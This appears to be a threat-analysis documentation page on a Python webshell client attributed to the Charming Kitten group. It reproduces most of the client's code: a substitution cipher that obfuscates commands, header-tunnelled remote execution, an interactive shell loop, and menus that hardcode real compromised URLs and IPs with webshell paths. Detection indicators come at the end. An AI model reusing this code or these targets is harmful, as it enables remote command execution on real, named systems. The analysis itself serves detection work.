Documentation Index
Fetch the complete documentation index at: https://mintlify.com/KittenBusters/CharmingKitten/llms.txt
Use this file to discover all available pages before exploring further.
Framework Components
The Python framework consists of three main scripts, each targeting different infrastructure:
- connect.py - Targets uniforms.flydubai.com with custom encoding
- rce5.py - Targets jordandesert.org.jo with custom encoding
- RCE4.py - Targets 193.188.88.156 with plaintext commands
Command Encoding Mechanism
Custom Substitution Cipher
Two of the scripts (connect.py and rce5.py) implement a custom character substitution cipher:
def encode(input_string):
# Define the original and replacement strings
en = rf"AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/";
de = rf"Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ";
# Create a translation table
translation_table = str.maketrans(en, de)
# Encode the input string using the translation table
encoded_string = input_string.translate(translation_table)
return encoded_string
Encoding Analysis
The cipher performs character-by-character substitution:
Original alphabet (en):
AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/
Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ
whoami → (encoded) → specific character sequence- Commands are obfuscated before transmission
- Server-side ASP script reverses the encoding
This simple substitution cipher provides minimal obfuscation against automated detection but is easily broken through frequency analysis.
Remote Execution Function
All three scripts share a similar remote_exec() function that handles command transmission:
With Encoding (connect.py, rce5.py)
def remote_exec(target, cmd):
headers["Accept-Language"] = cmd
try:
r = requests.get(target,headers=headers)
if r.status_code == 200:
data = r.text
else:
print(r.text)
return
except Exception as e:
print(e)
return
try:
dataq = data.split('\n')[:-1]
except:
print(dataq)
return
for x in dataq:
print(x)
Without Encoding (RCE4.py)
def remote_exec(target, cmd):
headers["Accept-Language"] = cmd
try:
r = requests.get(target,headers=headers,verify=False)
if r.status_code == 200:
data = r.text
else:
print(r.text)
return
except Exception as e:
print(e)
return
try:
dataq = data.split('\n')[:-1]
except:
print(dataq)
return
for x in dataq:
print(x)
- RCE4.py adds
verify=False to bypass SSL certificate validation
- Commands in RCE4.py are sent in plaintext (no encoding)
- All scripts use GET requests with custom headers
Interactive Shell Interface
Readline Integration
The scripts implement command-line completion using Python’s readline:
def complete(self, text, state):
if state == 0:
if len(text) == 0:
self.matches = [s for s in self.options.keys()]
elif len(text) != 0:
self.matches = [s for s in self.options.keys() if s and s.startswith(text)]
try:
return self.matches[state] + " "
except IndexError:
return None
readline.set_completer(complete)
readline.parse_and_bind('tab: complete')
readline.set_completer_delims('\n')
Command Loop
The main execution loop follows this pattern:
runingshell = True
while runingshell:
cmd = input("[webshell]> ").strip()
args = cmd.lower().split(" ")
if args[0] == "exit":
runingshell = False
elif args[0] == "help":
show_help()
else:
cmd = encode(cmd) # Only in connect.py and rce5.py
remote_exec(TargetURL, cmd)
Target Selection System
connect.py (flydubai.com)
while True:
print('select your Target')
print('1. uniforms.flydubai.com')
print('0. exit')
print('--------------------')
while True:
userinput = int(input(' ------ > ').strip())
if userinput == 0:
print('good bye commonder !')
exit()
elif userinput == 1 :
TargetURL = "https://uniforms.flydubai.com/images/flash/test9/m0s.phto"
break
else:
print('wrong input')
rce5.py (jordandesert.org.jo)
while True:
print('select your Target')
print('1. jordandesert.org.jo')
print('0. exit')
print('--------------------')
while True:
userinput = int(input(' ------ > ').strip())
if userinput == 0:
print('good bye commonder !')
exit()
elif userinput == 1:
TargetURL = "http://www.jordandesert.org.jo/CMS/Uploads/m0s.aspx"
break
else:
print('wrong input')
RCE4.py (193.188.88.156)
while True:
print('select your Target')
print('1. 193.188.88.156')
print('0. exit')
print('--------------------')
while True:
userinput = int(input(' ------ > ').strip())
if userinput == 0:
print('good bye commonder !')
exit()
elif userinput == 1:
TargetURL = "http://193.188.88.156/images/m0s.php"
break
else:
print('wrong input')
headers = {
"Accept-Captcha":"am=JgAAgP7jP38JwxmUgBgbuF8P_Nmlh2EEBhzhIQOBCEgGdAeWqYD_xNXr3UBFH35AAgACOJqOmhmdA2KVQwAEsGJYhhEAAAAAAAAAAA",
"Accept-Language" : "whoami",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
}
Accept-Captcha: Static token, possibly used for authentication or session trackingAccept-Language: Dynamically updated with commands (encoded or plaintext)User-Agent: Mimics Chrome 120 on Linux to blend with legitimate traffic
Security Implications
Strengths
- Custom encoding reduces signature-based detection
- HTTP header tunneling evades basic inspection
- Interactive interface provides operator flexibility
- Target management allows multi-target operations
Weaknesses
- Hardcoded targets reveal compromised infrastructure
- Static Accept-Captcha token serves as unique IOC
- Simple substitution cipher easily reversed
- No authentication on webshell side (any request with correct header works)
- Plaintext storage of target URLs and encoding logic
Detection Strategies
Network Detection
Alert on HTTP requests containing:
- Accept-Captcha header with value starting with "am=JgAAgP7jP38J"
- Unusual Accept-Language header values (non-language codes)
- GET requests to image directories returning command output
Behavioral Detection
- Repeated GET requests to static resources (images/flash/ directories)
- Responses from image files containing command-line output patterns
- HTTP 200 responses from .phto, .aspx, .php files in image directories